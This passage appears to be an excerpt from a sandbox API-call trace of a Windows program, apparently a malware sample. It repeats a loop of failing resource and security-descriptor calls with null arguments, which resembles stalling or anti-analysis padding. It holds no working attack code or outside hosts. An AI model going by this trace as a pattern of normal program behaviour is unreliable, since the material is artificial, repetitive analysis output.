ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.977] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.977] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.977] LockResource (hResData=0x0) returned 0x0 [0219.977] FreeResource (hResData=0x0) returned 0 [0219.977] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.977] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.978] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.978] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.978] LockResource (hResData=0x0) returned 0x0 [0219.978] FreeResource (hResData=0x0) returned 0 [0219.978] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.978] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.979] FreeResource (hResData=0x0) returned 0 [0219.979] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.979] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.979] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.979] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.979] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.979] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.980] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.980] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.980] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.980] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.980] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.980] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.980] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.980] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.980] FreeResource (hResData=0x0) returned 0 [0219.980] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.980] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.980] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.981] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.981] LockResource (hResData=0x0) returned 0x0 [0219.981] FreeResource (hResData=0x0) returned 0 [0219.981] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.981] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.981] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.981] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.982] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.982] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.982] LockResource (hResData=0x0) returned 0x0 [0219.982] FreeResource (hResData=0x0) returned 0 [0219.982] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.982] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.983] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0219.983] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0219.983] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0219.983] LockResource (hResData=0x0) returned 0x0 [0219.983] FreeResource (hResData=0x0) returned 0 [0219.983] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0219.983] 